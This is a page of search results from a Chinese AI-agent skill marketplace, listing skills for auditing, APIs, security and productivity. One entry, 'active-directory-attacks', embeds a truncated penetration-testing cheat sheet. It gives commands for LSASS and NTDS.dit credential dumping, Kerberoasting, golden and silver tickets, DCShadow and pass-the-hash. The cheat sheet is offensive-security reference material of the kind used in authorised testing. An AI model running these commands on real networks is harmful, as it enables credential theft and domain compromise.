灵感菇

AI 技能的自然生态,你的一句话,蔓延出无限连接。

搜索结果

全部能力

找到 494 个相关结果 / 后端与 API

安全与治理 / 审核评估

readwise-cli

readwise-cli

313

How to use the Readwise CLI — access highlights, documents, and your entire reading library from the command line

Stars 224
authreadwiseclihow

安全与治理 / 审核评估

ln-646-project-structure-auditor

ln-646-project-structure-auditor

313

Audits physical architecture structure: modules, domains, layer layout, junk drawers, and framework placement. Use for structure drift.

Stars 465
audit646projectstructure

安全与治理 / 审核评估

funda-data

funda-data

312

Fetch financial data from the Funda AI API (https://api.funda.ai). Covers quotes, historical prices, financials, SEC filings, transcripts, analyst estimates, options flow/greeks/GEX, supply chain graph, social sentiment, Polymarket, congressional trades, economics, ESG, news, AI-enriched news (sentiment + event timeline), AI-company recruit signals, and a Claude API proxy via Bedrock. Triggers: stock quotes, balance sheet, income statement, cash flow, analyst targets, DCF, options chain/flow, GEX, IV rank, max pain, earnings/dividend/IPO calendar, 10-K/10-Q/8-K, suppliers/customers/competitors, insider trades, 13F, Reddit/Twitter sentiment, Polymarket, treasury rates, GDP, CPI, FRED, commodity/forex/crypto, stock screener, ETF holdings, COT, ticker sentiment, OpenAI/Anthropic/xAI/Google/Mercor/SurgeAI job postings, product launch probabilities, AI threat to public stocks. Also triggers for "funda" or "funda.ai". If only a ticker is provided and Funda API can answer, use this skill.

Stars 0
uiperformanceauthapi

安全与治理 / 审核评估

logging-best-practices

logging-best-practices

310

Logging best practices for applications and services including structured logging, log levels, and log management strategies

Stars 111
auditdebuggingmonitoringlogging

安全与治理 / 审核评估

network-watcher

network-watcher

310

Audit and monitor network requests made by OpenClaw skills. Detects data exfiltration, unauthorized API calls,

Stars 52
securityauditauthapi

安全与治理 / 审核评估

secrets-rotation

secrets-rotation

309

Implement automated secrets rotation for API keys, credentials, certificates, and encryption keys. Use when managing secrets lifecycle, compliance requirements, or security hardening.

Stars 219
uideploymentsecurityaudit

安全与治理 / 审核评估

google-sheets

google-sheets

307

Google Sheets integration. Manage analytics data, records, and workflows. Use when the user wants to interact with Google Sheets data.

Stars 35
authapiworkflowgoogle

安全与治理 / 审核评估

ln-644-dependency-graph-auditor

ln-644-dependency-graph-auditor

302

Builds dependency graph, detects cycles, validates boundary rules, calculates coupling metrics (Ca/Ce/I). Use when auditing dependency structure.

Stars 465
uiaudit644dependency

安全与治理 / 审核评估

Active Directory 攻击

active-directory-attacks

300

Active Directory 渗透测试技术指南 ## 信息收集 ### 域基础信息 - `nltest /domain_trusts` - 查看域信任关系 - `net view /domain` - 枚举域列表 - `nslookup -type=SRV _ldap._tcp.dc._msdcs.<domain>` - 定位域控制器 ### BloodHound 资产发现 ```powershell # SharpHound 数据收集 Invoke-BloodHound -CollectionMethod All -Domain target.com -ZipFileName loot.zip ``` ### LDAP 查询 ```powershell # 查找域管账户 ([adsisearcher]"(&(objectCategory=person)(objectClass=user)(adminCount=1))").FindAll() # 查找非约束委派的服务账户 Get-ADObject -LDAPFilter "(&(userAccountControl:1.2.840.113556.1.4.803:=524288)(samAccountType=805306368))" ``` ## 凭据获取 ### LSASS 内存提取 ```powershell # procdump + mimikatz 离线解析 procdump.exe -accepteula -ma lsass.exe lsass.dmp sekurlsa::minidump lsass.dmp sekurlsa::logonPasswords full ``` ### SAM/NTDS.dit 提取 ```powershell # Volume Shadow Copy 方式 vssadmin create shadow /for=C: copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\loot\ copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\loot\ # ntdsutil 官方工具 ntdsutil "ac i ntds" "ifm" "create full c:\loot" q q ``` ### Kerberoasting ```powershell # 请求 SPN 服务票据 Add-Type -AssemblyName System.IdentityModel New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/sql01.target.com:1433" # Rubeus 自动化 Rubeus.exe kerberoast /outfile:hashes.txt ``` ## Kerberos 攻击 ### AS-REP Roasting ```powershell # 查找 "Do not require Kerberos preauthentication" 账户 Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true} -Properties DoesNotRequirePreAuth # Rubeus 攻击 Rubeus.exe asreproast /format:hashcat /outfile:asrep.txt ``` ### Golden Ticket ```powershell # 需要 krbtgt 账户的 NTLM hash mimikatz # lsadump::dcsync /domain:target.com /user:krbtgt mimikatz # kerberos::golden /user:Administrator /domain:target.com /sid:S-1-5-21-... /krbtgt:hash /ptt ``` ### Silver Ticket ```powershell # 针对特定服务,需要服务账户 NTLM hash mimikatz # kerberos::golden /user:fakeuser /domain:target.com /sid:S-1-5-21-... /target:sql01.target.com /service:MSSQLSvc /rc4:servicehash /ptt ``` ### DCShadow ```powershell # 需要域管权限,注册伪造 DC mimikatz # lsadump::dcshadow /object:targetuser /attribute:Description /value:"backdoor" ``` ## 横向移动 ### Pass-the-Hash ```powershell # mimikatz sekurlsa::pth /user:admin /domain:target.com /ntlm:hash /run:powershell.exe # Invoke-WMIExec Invoke-WMIExec -Target dc01.target.com -Username admin -Hash hash -Command "powershell -enc ..." ``` ### Over-Pass-the-Hash ```powershell # 获取 TGT 后使用正常 Kerberos 认证 Rubeus.exe asktgt /user:admin /rc4:hash /ptt ``` ### Pass-the-Ticket ```powershell # 导出票据后注入 mimikatz # sekurlsa::tickets /export mimikatz # kerberos::ptt [0;123456]-0-0-40810000-admin@krbtgt-target.com.kirbi ``` ### 约束委派滥用 ```powershell # 配置 S4U2Self + S4U2Proxy Rubeus.exe s4u /user:svc_account /rc4:hash /impersonateuser:admin /msdsspn:cifs/target.target.com /ptt ``` ### 基于资源的约束委派 (RBCD

Stars 0
uiuxtestingsecurity

安全与治理 / 审核评估

roier-seo

roier-seo

299

Technical SEO auditor and fixer. Runs Lighthouse/PageSpeed audits on websites or local dev servers, analyzes SEO/performance/accessibility scores, and…

Stars 27,327
performanceauditroierseo

安全与治理 / 审核评估

ln-512-tech-debt-cleaner

ln-512-tech-debt-cleaner

299

Auto-fixes low-risk tech debt (unused imports, dead code, commented-out code) with >=90% confidence. Use when audit findings need safe automated cleanup.

Stars 465
audit512techdebt

安全与治理 / 审核评估

prompt-guard

prompt-guard

298

600+ pattern AI agent security defense covering prompt injection, supply chain injection, memory poisoning, action gate bypass, unicode steganography, and…

Stars 157
securityapiragprompt

安全与治理 / 审核评估

阿里云安全-KMS测试

alicloud-security-kms-test

295

KMS 技能的最小化冒烟测试。验证认证和只读密钥列表路径。

Stars 0
uisecurityauthapi

安全与治理 / 审核评估

risk-management-trading

risk-management-trading

291

Master of capital preservation and position sizing - combining Kelly Criterion, volatility targeting, correlation analysis, and drawdown management to survive…

Stars 82
apiriskmanagementtrading

安全与治理 / 审核评估

azure-functions

azure-functions

290

Create serverless functions on Azure with triggers, bindings, authentication, and monitoring. Use for event-driven computing without managing infrastructure.

Stars 219
uiauthpromptmonitoring

安全与治理 / 审核评估

getnote-auth

getnote-auth

288

Manage authentication for Get笔记 CLI

Stars 74
authapigetnotemanage

安全与治理 / 审核评估

surprise-me

surprise-me

285

Analyze your reading history and tell you something surprising you don't know about yourself

Stars 224
uiauthsurpriseanalyze

安全与治理 / 审核评估

code-review-security

code-review-security

283

Security-focused code review checklist and automated scanning patterns. Use when reviewing pull requests for security issues, auditing authentication/authorization code, checking for OWASP Top 10 vulnerabilities, or validating input sanitization. Covers SQL injection prevention, XSS protection, CSRF tokens, authentication flow review, secrets detection, dependency vulnerability scanning, and secure coding patterns for Python (FastAPI) and React. Does NOT cover deployment security (use docker-best-practices) or incident handling (use incident-response).

Stars 8
reactdockerdeploymentsecurity

安全与治理 / 审核评估

阿里云安全-内容安全-内容审核(绿网)

alicloud-security-content-moderation-green

273

通过 OpenAPI/SDK 管理阿里云内容安全(Green)。当用户需要内容安全资源和策略操作时随时使用,包括…

Stars 0
uisecurityapiworkflow

安全与治理 / 审核评估

sim

sim

271

Dune Sim API for real-time blockchain wallet and token lookups across EVM and SVM chains. Use when user asks about wallet balances, token prices, NFT holdings,…

Stars 11
uiauthapisql

15 / 25